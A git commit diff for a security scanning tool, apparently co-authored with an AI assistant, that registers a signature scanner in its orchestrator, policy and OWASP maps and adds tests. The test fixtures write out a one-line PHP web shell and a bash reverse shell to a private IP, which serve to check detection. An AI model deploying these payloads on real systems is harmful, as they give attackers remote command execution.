feat(llm-security): wire SIG scanner into orchestrator and policy

Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
Claude-Session: https://claude.ai/code/session_01V3s6WnubSSrFjAQTLQdVbG
This commit is contained in:
Kjell Tore Guttormsen 2026-06-20 09:32:23 +02:00
commit e46bf12b86
4 changed files with 64 additions and 1 deletions

View file

@ -83,6 +83,12 @@ const DEFAULT_POLICY = Object.freeze({
'run', 'do', 'go', 'help', 'fix', 'use', 'get', 'set', 'all', 'any', 'it', 'this', 'that',
],
},
// SIG — known-bad-identity signature engine. Toggle families or point at a
// custom ruleset via policy.json.
sig: {
enabled_families: ['webshell', 'reverse_shell', 'cryptominer', 'hacktool'],
custom_rules_path: null,
},
});
// Cache loaded policy per project root

View file

@ -144,6 +144,7 @@ export const OWASP_MAP = Object.freeze({
PST: ['LLM01', 'LLM06'],
WFL: ['LLM02', 'LLM06'],
TRG: ['LLM06'],
SIG: ['LLM03', 'LLM02'],
});
/**
@ -164,6 +165,7 @@ export const OWASP_AGENTIC_MAP = Object.freeze({
PST: ['ASI02', 'ASI03', 'ASI04', 'ASI05'],
WFL: ['ASI04'],
TRG: [],
SIG: ['ASI04'],
});
/**
@ -184,6 +186,7 @@ export const OWASP_SKILLS_MAP = Object.freeze({
PST: ['AST01', 'AST03'],
WFL: [],
TRG: ['AST04'],
SIG: [],
});
/**
@ -204,6 +207,7 @@ export const OWASP_MCP_MAP = Object.freeze({
PST: ['MCP02', 'MCP07'],
WFL: [],
TRG: [],
SIG: [],
});
/**

View file

@ -110,6 +110,7 @@ import { scan as supplyChainScan } from './supply-chain-recheck.mjs';
import { scan as workflowScan } from './workflow-scanner.mjs';
import { scan as tfaScan } from './toxic-flow-analyzer.mjs';
import { scan as trgScan } from './trigger-scanner.mjs';
import { scan as sigScan } from './signature-scanner.mjs';
const SCANNERS = [
{ name: 'unicode', fn: unicodeScan },
@ -123,6 +124,7 @@ const SCANNERS = [
{ name: 'supply-chain', fn: supplyChainScan },
{ name: 'workflow', fn: workflowScan },
{ name: 'trg', fn: trgScan },
{ name: 'sig', fn: sigScan },
{ name: 'toxic-flow', fn: tfaScan, requiresPriorResults: true },
];

View file

@ -8,7 +8,7 @@ import { describe, it, beforeEach } from 'node:test';
import assert from 'node:assert/strict';
import { resolve, join } from 'node:path';
import { fileURLToPath } from 'node:url';
import { mkdtempSync, mkdirSync, writeFileSync, rmSync } from 'node:fs';
import { mkdtempSync, mkdirSync, writeFileSync, rmSync, readFileSync } from 'node:fs';
import { tmpdir } from 'node:os';
import { resetCounter } from '../../scanners/lib/output.mjs';
import { discoverFiles } from '../../scanners/lib/file-discovery.mjs';
@ -124,3 +124,54 @@ describe('signature-scanner: path exclusions', () => {
}
});
});
// ---------------------------------------------------------------------------
// Wiring — OWASP map + orchestrator registration (Step 4)
// ---------------------------------------------------------------------------
describe('signature-scanner: OWASP map registration', () => {
it('SIG is present in all four OWASP maps with the right codes', async () => {
const { OWASP_MAP, OWASP_AGENTIC_MAP, OWASP_SKILLS_MAP, OWASP_MCP_MAP } =
await import('../../scanners/lib/severity.mjs');
assert.deepEqual(OWASP_MAP.SIG, ['LLM03', 'LLM02']);
assert.deepEqual(OWASP_AGENTIC_MAP.SIG, ['ASI04']);
assert.deepEqual(OWASP_SKILLS_MAP.SIG, []);
assert.deepEqual(OWASP_MCP_MAP.SIG, []);
});
});
describe('signature-scanner: orchestrator registration', () => {
it('scan-orchestrator imports and lists the SIG scanner', () => {
const orchPath = resolve(__dirname, '../../scanners/scan-orchestrator.mjs');
const text = readFileSync(orchPath, 'utf8');
assert.match(text, /import\s+\{\s*scan as sigScan\s*\}\s+from\s+['"]\.\/signature-scanner\.mjs['"]/);
assert.match(text, /\{\s*name:\s*'sig',\s*fn:\s*sigScan\s*\}/);
});
});
// ---------------------------------------------------------------------------
// Policy — disabling a family suppresses only that family's findings (Step 4)
// ---------------------------------------------------------------------------
describe('signature-scanner: family disable', () => {
it('disabling "webshell" suppresses webshell findings but keeps reverse_shell', async () => {
const dir = mkdtempSync(join(tmpdir(), 'sig-family-'));
try {
mkdirSync(join(dir, '.llm-security'), { recursive: true });
writeFileSync(
join(dir, '.llm-security', 'policy.json'),
JSON.stringify({ sig: { enabled_families: ['reverse_shell'] } }),
);
writeFileSync(join(dir, 'shell.php'), "<?php @eval($_POST['cmd']); ?>\n");
writeFileSync(join(dir, 'rev.sh'), '#!/bin/sh\nbash -i >& /dev/tcp/10.0.0.1/4444 0>&1\n');
resetCounter();
const discovery = await discoverFiles(dir);
const result = await scan(dir, discovery);
const families = result.findings.map(f => f.evidence);
assert.ok(!families.some(e => /\[webshell\]/.test(e)), `webshell family should be suppressed, got: ${families.join('; ')}`);
assert.ok(families.some(e => /\[reverse_shell\]/.test(e)), `reverse_shell should still fire, got: ${families.join('; ')}`);
} finally {
rmSync(dir, { recursive: true, force: true });
}
});
});